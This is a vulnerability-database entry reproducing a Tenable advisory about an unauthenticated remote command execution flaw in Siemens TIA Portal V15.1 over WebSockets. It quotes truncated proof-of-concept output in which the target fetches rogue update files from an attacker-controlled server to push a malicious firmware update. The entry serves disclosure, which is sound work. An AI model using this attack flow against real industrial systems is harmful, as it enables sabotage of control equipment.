Siemens TIA Portal (STEP7) Remote...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Synopsis Tenable discovered a vulnerability in Siemens TIA Portal V15.1. The vulnerability is an unauthenticated, remote command execution vulnerability that allows a remote, unauthenticated attacker administrative access to all application commands. An attacker can execute application functionality by sending crafted packets over WebSockets protocol. The following output is from a proof of concept that triggers a malicious firmware update from an arbitrary server: ``` $python siemens_rce.py Starting httpd... 10.0.0.134 - - [08/Jul/2019 10:47:31] "GET /PWRSim/ HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:33] "GET /PWRSim/PWRControlNet10 HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:39] "GET /PWRSim/PWRControlNet10/SWM_RollOut_Configuration.xml HTTP/1.1" 200 - 10.0.0.134 - - [08/Jul/2019 10:47:43] "GET /PWRSim/PWRControlNet10/UpdatesSummaryCatalog.xml HTTP/1.1" 200 - [+] Writing xml update forwarder -> Inventory_TIAPORTAL_V15_UPD99.xml 10.0.0.134 - - [08/Jul/2019...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息